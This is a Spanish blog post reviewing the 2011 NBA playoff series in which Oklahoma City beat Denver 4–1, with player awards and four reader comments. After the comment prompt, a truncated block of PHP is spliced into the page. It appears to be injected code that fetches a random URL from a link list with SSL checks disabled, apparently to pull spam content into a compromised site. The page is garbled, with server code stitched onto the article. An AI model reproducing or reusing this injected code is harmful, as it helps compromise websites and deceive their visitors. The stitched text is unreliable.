Primera Ronda del Oeste: Thunder 4 – Nuggets 1

29 de April de 2011 por TheDeerHunter

Algo gordo se está cociendo en Oklahoma. De momento no es tangible, sólo es algo que se intuye. Hasta la fecha, el rendimiento de Durant y sus Thunder había sido bueno, pero no deslumbrante. En algunos ámbitos se llegó incluso a calificar como decepcionante a la temporada de Oklahoma, tal es el grado de expectación que se generó tras los últimos playoffs contra los Lakers. Pero tras la llegada de Perkins y Mohammed, coincidiendo con una mejora súbita en juego y resultados, algunos llegaron a colocarles casi al nivel de los favoritos. Parece un tanto excesivo si únicamente viene justificado por la calidad de las incorporaciones frente al nivel de los prescindidos.

Efectivamente la producción hasta el momento de Perkins y Mohammed no les puede quitar de pobres. Sin embargo parece que los Thunder se lo han creído y con un nivel de juego extraordinario se han desecho en 5 partidos de un equipo bien armado como son los Nuggets. Ya veríamos cómo lo hubieran hecho ante ellos el resto de gallos de la liga. Otra eliminatoria que parece dar la razón al modelo “estelar” frente al modelo “grupo”.

Kevin Durant ha sido un dios en esta serie, el mejor jugador de la primera ronda. Los Nuggets tienen buenos aleros y defensores, pero Durantula los ha crugido uno tras otro. Su brillo ha sido aún mayor conforme sus rivales les han puesto las cosas más difíciles. Cuanto más apretado mejor. Característica inequívoca de grandeza. ¿Está ya preparado para escribir su nombre en los altares? Quizás sí.

Con la explosión de Durant más la inestimable ayuda de su escudero all-star Russell Westbrook, sumado a que los Nuggets no son equipo eminentemente defensivo, los Thunder no han sufrido adaptación a playoffs. En cambio sí han apretado bien las tuercas en defensa menguando la producción rival en 10 puntos vitales. Mención especial en este capítulo a Serge Ibaka, monstruo capaz de repartir 5 tapones por partido y acobardar al más pintado. Adicionalmente ha cerrado bien el rebote, aunque debería mejorar su nivel ofensivo a pesar de que al equipo tampoco le hace mucha falta.

Los Nuggets han plantado cara y el resultado es engañoso respecto a su nivel. No deberíamos olvidar que han perdido 3 partidos por 3 puntos. Lawson y Nené han sido sus mejores hombres, notándose como ya advertimos el aspecto físico en hombres importantes. Un equipo peligrosísimo que ojalá sepa traducir el riquísimo roster que ha acumulado en las piezas adecuadas para ser referente en el Oeste. Las cartas las tienen en la mano, ahora hace falta jugarlas bien.

PREMIOS

MVP: El mejor de esta serie y de toda la primera ronda. Kevin Durant ha registrado 34.4 puntos, 5.6 rebotes, 3.6 asistencias, 1 tapón y 1 robo por partido. Serie mítica de una leyenda en ciernes.

Sorpresa: Aunque no estuviera en ninguna quiniela para jugador defensivo del año, Serge Ibaka ha sido el máximo taponador del curso. Aún así no esperábamos la brutalidad con la que ha oscurecido el horizonte a los jugadores de los Nuggets en esta serie. 4.8 tapones por partido!!! ¿pero qué me estás contando??

Decepción: Por unos motivos u otros la profundidad y calidad de la plantilla de los Nuggets ha fallado en esta serie. Esperamos mucho más de Gallinari, Felton, JR Smith, Al Harrington, Wilson Chandler… e incluso de “Birdman” Andersen.

Esfuerzo en vano: Ty Lawson y Nené Hilario han cuajado una gran serie. Se pueden ir de vacaciones con la conciencia tranquila.

Comenta

4 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Sin duda Durantula ha sido el jugador de los playoffs en la primera ronda. Habrá que ver si sigue a este nivel aunque como ya puse en el post del ultimo partido creo que una leyenda está empezando y que salvo lesión será muy difícil de para. Para mí el gran salto que hace a estos Thunder candidatos es su defensa interior respecto al año pasado. Perkins, Ibaka y Mohamed son verdaderos defensores de la pintura y van a hacer sudar sangre para anotar debajo del aro a los demás equipos. Lo único que me hace dudar de estos Thunder es su capacidad para generar juego ofensivo por dentro y el hecho de que a veces a Westbrook se le olvida que un base debe hacer jugar al equipo más que buscar su propia producción. Para mí son favoritos en la próxima ronda. más contra Grizzlies que contra Spurs, pero favoritos contra ambos.
    Los Nuggets han luchado mucho y bien en esta eliminatoria pero les ha faltado un hombre decisivo en los finales de los partidos que pudiera contrarrestar a Durant. Tienen un equipo muy profundo, tanto que hace que algunos jugadores se pierdan como Al Harrington o Wilson Chandler que no han estado al nivel que pueden dar. Fenomenal serie de Ty Lawson haciendo bueno el trade de Billups a NY y muy bien también Nené que se ha pegado con todos los interiores de los Thunder. El futuro les llama y habrá que ver este verano si realizan algún movimiento que les acerque a la élite.

      Citar

  2. Txusma dice:
    #2

    Al Harrignton no ha estado bien en todo el año, Chandler sí que parece haberse perdido un poco. El futuro de los Nuggets tb es interesante. Parece que Lawson y Gallinari son de momento los únicos intocables de la plantilla.

      Citar

  3. KB # 24 dice:
    #3

    Me encanta Durant, no está musculado, no lleva tatuajes, no es mediático, pero es un pedazo de jugador!

    Hay una jugada contra los Nuggets game 5 que bota el balón desde media cancha se para en la línia de 3 y tira sin pensárselo, a falta de unos 16 segundos. Quién le puede hacer un tapón a un tío de 2.08 que salta lo suyo….??

    Simplemente grandísima seria de KD

      Citar

  4. Jabho dice:
    #4

    Los Thunder si no se vuelven locos y no tienen mala suerte con las lesiones van luchar por el anillo los próximos 5 años… este año les llega algo pronto y creo que palmaran la final contra Lakers, pero el año que vienen habrá que incluirlos entre los candidatos desde el comienzo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>